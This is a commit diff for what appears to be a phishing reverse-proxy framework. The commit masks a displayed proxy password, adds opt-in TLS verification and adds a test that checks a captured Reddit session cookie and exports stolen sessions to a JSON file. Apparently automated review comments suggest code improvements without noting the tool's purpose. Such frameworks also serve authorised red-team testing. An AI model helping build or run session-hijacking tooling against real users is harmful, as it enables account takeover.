
Commit 954b42e

committed
Remove full printing of proxy password, test session export to file, allow verifying TLS certificates (opt-in)
1 parent 3247eaa commit 954b42e

6 files changed

Lines changed: 29 additions & 5 deletions


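--- a/.gitignore
+++ b/.gitignore
@@ -1,3 +1,4 @@
 phishlets/test-*
 /*.exe
 /tmp_cfg
+/export.json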

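--- a/core/banner.go
+++ b/core/banner.go
@@ -8,7 +8,7 @@ import (
 )
 
 const (
-VERSION = "2.4.2"
+VERSION = "2.4.3"
 )
 
 func putAsciiArt(s string) {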

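--- a/core/certdb.go
+++ b/core/certdb.go
@@ -394,7 +394,9 @@ func (d *CertDb) registerCertificate(domains []string) (*certificate.Resource, e
 func (d *CertDb) getServerCertificate(host string, port int) *x509.Certificate {
 log.Debug("Fetching TLS certificate from %s:%d ...", host, port)
 
-config := tls.Config{InsecureSkipVerify: true}
+config := tls.Config{
+InsecureSkipVerify: (os.Getenv("VALIDATETLS") != "YES"),
+}
 conn, err := tls.Dial("tcp", fmt.Sprintf("%s:%d", host, port), &config)
 if err != nil {
 log.Warning("Could not fetch TLS certificate from %s:%d: %s", host, port, err)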
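Review bot: The VALIDATETLS lookup added here duplicates the one in core/http_proxy.go's TLSConfigFromCA, with the same two magic strings in both places, so the two code paths can silently diverge the next time either is edited; a single package-level helper such as `func tlsSkipVerify() bool { return os.Getenv("VALIDATETLS") != "YES" }` (or a value read once at startup) would keep them consistent and give the opt-in one documented home. The default remains to skip verification, and nothing in the added lines says so; a comment above the config like `// Certificate verification is opt-in: set VALIDATETLS=YES to enforce it.` would make the behaviour explicit to the next reader. Whether certdb.go already imports os is not visible in this hunk. getServerCertificate continues below the hunk.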

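--- a/core/http_proxy.go
+++ b/core/http_proxy.go
@@ -1080,6 +1080,7 @@ func (p *HttpProxy) patchUrls(pl *Phishlet, body []byte, c_type int) []byte {
 
 func (p *HttpProxy) TLSConfigFromCA() func(host string, ctx *goproxy.ProxyCtx) (*tls.Config, error) {
 return func(host string, ctx *goproxy.ProxyCtx) (c *tls.Config, err error) {
+skipVerify := (os.Getenv("VALIDATETLS") != "YES")
 parts := strings.SplitN(host, ":", 2)
 hostname := parts[0]
 port := 443
@@ -1105,7 +1106,7 @@ func (p *HttpProxy) TLSConfigFromCA() func(host string, ctx *goproxy.ProxyCtx) (
 }
 if cert != nil {
 return &tls.Config{
-InsecureSkipVerify: true,
+InsecureSkipVerify: skipVerify,
 Certificates: []tls.Certificate{*cert},
 }, nil
 }
@@ -1127,7 +1128,7 @@ func (p *HttpProxy) TLSConfigFromCA() func(host string, ctx *goproxy.ProxyCtx) (
 return nil, err
 }
 return &tls.Config{
-InsecureSkipVerify: true,
+InsecureSkipVerify: skipVerify,
 Certificates: []tls.Certificate{*cert},
 }, nil
 }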
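Review bot: skipVerify is computed inside the returned closure, so os.Getenv runs on every TLS handshake the proxy handles; moving `skipVerify := (os.Getenv("VALIDATETLS") != "YES")` above `return func(host string, ctx *goproxy.ProxyCtx) ...` evaluates it once when TLSConfigFromCA builds the closure and keeps the per-connection path free of environment reads. Separately, InsecureSkipVerify governs a client's verification of the peer certificate, while both configs in the later hunks are returned with Certificates for the proxy's own side of the connection — if goproxy only uses this config to terminate TLS, the field is probably a no-op here and the change should not be documented as enabling upstream verification on this path; worth confirming against goproxy before relying on it. The closure body of TLSConfigFromCA continues outside the hunks.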

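--- a/core/terminal.go
+++ b/core/terminal.go
@@ -257,8 +257,16 @@ func (t *Terminal) handleProxy(args []string) error {
 proxy_enabled = "yes"
 }
 
+var censoredPassword string
+for i, passChar := range t.cfg.proxyPassword {
+appendChar := passChar
+if i > 2 {
+appendChar = '*'
+}
+censoredPassword = censoredPassword + string(appendChar)
+}
 keys := []string{"enabled", "type", "address", "port", "username", "password"}
-vals := []string{proxy_enabled, t.cfg.proxyType, t.cfg.proxyAddress, strconv.Itoa(t.cfg.proxyPort), t.cfg.proxyUsername, t.cfg.proxyPassword}
+vals := []string{proxy_enabled, t.cfg.proxyType, t.cfg.proxyAddress, strconv.Itoa(t.cfg.proxyPort), t.cfg.proxyUsername, censoredPassword}
 log.Printf("\n%s\n", AsRows(keys, vals))
 return nil
 } else if pn == 1 {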
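Review bot: The masking loop still prints the first three characters of the proxy password in clear, which a status display does not need, and the mask length reveals the password length as well; since this value is only shown, a fixed mask leaks neither: `censoredPassword := ""` followed by `if t.cfg.proxyPassword != "" { censoredPassword = "********" }`. If a partial reveal is intentional, note that ranging over a string yields byte offsets, so `i > 2` exposes up to three bytes rather than three characters for non-ASCII input, and the repeated `+` concatenation would read better as a strings.Builder. handleProxy continues outside the hunk.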

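--- a/main_test.go
+++ b/main_test.go
@@ -136,6 +136,18 @@ func TestStart(t *testing.T) {
 terminal.ProcessCommand("sessions 1")
 test.assertLogContains("captured", "Session token captured")
 test.assertLogContains(`","name":"reddit_session","httpOnly":true`, "Session cookie displayed")
+test.Clear()
+
+exportPath := path+"/export.json"
+os.RemoveAll(exportPath)
+terminal.ProcessCommand("sessions export json "+strings.ReplaceAll(exportPath, `\`, `\\`))
+test.assertLogContains("exported sessions to json", "Can export sessions to file")
+time.Sleep(1 * time.Second)
+readDump, err := ioutil.ReadFile(exportPath)
+test.outputResult(
+(err == nil && strings.Contains(string(readDump), `"id":"1"`)),
+"Dumped sessions are valid",
+)
 
 //log.Println(buf.String())
 }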
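Review bot: `time.Sleep(1 * time.Second)` is the only synchronisation between the export command and the ReadFile that follows, which both slows the test by a fixed second and stays flaky whenever the write takes longer than that; polling for the file (retrying os.Stat or the read every few tens of milliseconds up to a bounded deadline) would be deterministic and usually faster. The `os.RemoveAll` error is dropped and a failing `ioutil.ReadFile` is folded into the boolean passed to outputResult, so a failure reports only "Dumped sessions are valid" with no cause — logging err alongside the result would make failures diagnosable. ioutil.ReadFile has been deprecated in favour of os.ReadFile since Go 1.16, if the module's Go version allows the swap. TestStart begins before this hunk.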
